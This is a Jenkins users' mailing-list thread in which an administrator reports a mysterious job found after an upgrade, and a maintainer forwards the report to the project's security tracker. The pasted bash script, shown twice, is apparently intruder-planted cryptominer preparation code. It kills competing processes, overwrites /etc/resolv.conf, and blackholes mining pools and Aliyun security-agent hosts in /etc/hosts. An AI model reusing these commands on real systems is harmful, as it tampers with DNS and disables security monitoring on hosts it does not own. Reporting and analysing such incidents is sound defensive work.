Potential Malware
56 views
Skip to first unread message
Randall Becker
Jun 22, 2020, 1:15:02 PM6/22/20
to Jenkins Users
Hi All,
We just installed Jenkins 2.240 and suddenly there is a job with some really strange content, including:
#!/bin/bash
threadCount=$(lscpu | grep 'CPU(s)' | grep -v ',' | awk '{print $2}' | head -n 1);
hostHash=$(hostname -f | md5sum | cut -c1-8);
echo "${hostHash} - ${threadCount}";
ktr () {
killall trace;pkill -9 -f trace;killall -s SIGKILL trace
killall vunix;pkill -9 -f vunix;killall -s SIGKILL vunix
killall viunix;pkill viunix;killall -s SIGKILL viunix
kill -9 $(ps -ux | grep trace | awk '{ print $2 }')
kill -9 $(ps -ux | grep vunix | awk '{ print $2 }')
kill -9 $(ps -ux | grep viunix | awk '{ print $2 }')
echo kill
}
ktr
ktr
ktr
echo plsfoodforcatsnlove
echo 'nameserver 1.1.1.1' > /etc/resolv.conf;echo 'nameserver 8.8.8.8' >> /etc/resolv.conf;echo 'nameserver 180.76.76.76' >> /etc/resolv.conf
echo "0.0.0.0 blockchain.info" >> /etc/hosts;echo "0.0.0.0 35.225.36.167" >> /etc/hosts;echo "0.0.0.0 100.100.25.3 jsrv.aegis.aliyun.com" >> /etc/hosts
echo "0.0.0.0 100.100.25.4 update.aegis.aliyun.co" >> /etc/hosts;echo "0.0.0.0 185.164.72.119" >> /etc/hosts;echo "0.0.0.0 163.172.191.181" >> /etc/hosts
echo "0.0.0.0 pool.supportxmr.com" >> /etc/hosts;echo "0.0.0.0 pinto.mamointernet.icu" >> /etc/hosts;echo "0.0.0.0 sdk.bce.baidu.com" >> /etc/hosts
echo "0.0.0.0 lsd.systemten.org" >> /etc/hosts;
echo "0.0.0.0 pool.minexmr.com" >> /etc/hosts
echo "0.0.0.0 minexmr.com" >> /etc/hosts
threadCount=$(lscpu | grep 'CPU(s)' | grep -v ',' | awk '{print $2}' | head -n 1);
hostHash=$(hostname -f | md5sum | cut -c1-8);
echo "${hostHash} - ${threadCount}";
ktr () {
killall trace;pkill -9 -f trace;killall -s SIGKILL trace
killall vunix;pkill -9 -f vunix;killall -s SIGKILL vunix
killall viunix;pkill viunix;killall -s SIGKILL viunix
kill -9 $(ps -ux | grep trace | awk '{ print $2 }')
kill -9 $(ps -ux | grep vunix | awk '{ print $2 }')
kill -9 $(ps -ux | grep viunix | awk '{ print $2 }')
echo kill
}
ktr
ktr
ktr
echo plsfoodforcatsnlove
echo 'nameserver 1.1.1.1' > /etc/resolv.conf;echo 'nameserver 8.8.8.8' >> /etc/resolv.conf;echo 'nameserver 180.76.76.76' >> /etc/resolv.conf
echo "0.0.0.0 blockchain.info" >> /etc/hosts;echo "0.0.0.0 35.225.36.167" >> /etc/hosts;echo "0.0.0.0 100.100.25.3 jsrv.aegis.aliyun.com" >> /etc/hosts
echo "0.0.0.0 100.100.25.4 update.aegis.aliyun.co" >> /etc/hosts;echo "0.0.0.0 185.164.72.119" >> /etc/hosts;echo "0.0.0.0 163.172.191.181" >> /etc/hosts
echo "0.0.0.0 pool.supportxmr.com" >> /etc/hosts;echo "0.0.0.0 pinto.mamointernet.icu" >> /etc/hosts;echo "0.0.0.0 sdk.bce.baidu.com" >> /etc/hosts
echo "0.0.0.0 lsd.systemten.org" >> /etc/hosts;
echo "0.0.0.0 pool.minexmr.com" >> /etc/hosts
echo "0.0.0.0 minexmr.com" >> /etc/hosts
This is really creepy because this script cannot possibly run on our system (the good part). The bad part is that no one in our organization created this job. Is it possible that there is some malware floating around? Our Jenkins instance is hiding behind a firewall so there's no way in.
Thanks,
Randall
Daniel Beck
Jun 22, 2020, 2:00:09 PM6/22/20
to jenkins...@googlegroups.com
Thanks for your report.
I filed an issue on your behalf in the Jenkins project's private security issue tracker. You should have gotten an email notification from Jira about it. Please provide more information there to help us investigate.
> --
> You received this message because you are subscribed to the Google Groups "Jenkins Users" group.
> To unsubscribe from this group and stop receiving emails from it, send an email to jenkinsci-use...@googlegroups.com.
> To view this discussion on the web visit https://groups.google.com/d/msgid/jenkinsci-users/389e7848-bad2-4044-ab9d-c3fd0f106256o%40googlegroups.com.
I filed an issue on your behalf in the Jenkins project's private security issue tracker. You should have gotten an email notification from Jira about it. Please provide more information there to help us investigate.
> You received this message because you are subscribed to the Google Groups "Jenkins Users" group.
> To unsubscribe from this group and stop receiving emails from it, send an email to jenkinsci-use...@googlegroups.com.
> To view this discussion on the web visit https://groups.google.com/d/msgid/jenkinsci-users/389e7848-bad2-4044-ab9d-c3fd0f106256o%40googlegroups.com.
Jan Monterrubio
Jul 1, 2020, 9:55:06 AM7/1/20
to Jenkins Users
Randall/Daniel, if there does end up being malware for this release would you mind replying on this thread?
On Monday, June 22, 2020 at 1:00:09 PM UTC-5, Daniel Beck wrote:
Thanks for your report.
I filed an issue on your behalf in the Jenkins project's private security issue tracker. You should have gotten an email notification from Jira about it. Please provide more information there to help us investigate.
> To unsubscribe from this group and stop receiving emails from it, send an email to jenkins...@googlegroups.com.
Randall Becker
Jul 1, 2020, 10:42:22 AM7/1/20
to Jenkins Users
We have locked down the system and have not had a recurrence. If there is one, I will report it ASAP.
Thank you all for the concern :)
Cheers,
Randall
Reply all
Reply to author
Forward
0 new messages